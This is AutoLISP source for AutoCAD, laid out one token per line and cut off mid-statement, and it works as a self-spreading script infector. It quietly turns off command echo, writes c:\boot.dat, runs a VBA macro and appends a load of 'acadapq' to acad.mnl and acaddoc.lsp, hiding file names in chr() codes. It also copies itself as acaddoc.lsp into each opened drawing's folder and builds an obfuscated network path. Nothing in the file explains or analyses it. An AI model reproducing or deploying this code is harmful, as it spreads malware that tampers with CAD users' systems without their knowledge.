(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddoc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
(chr 
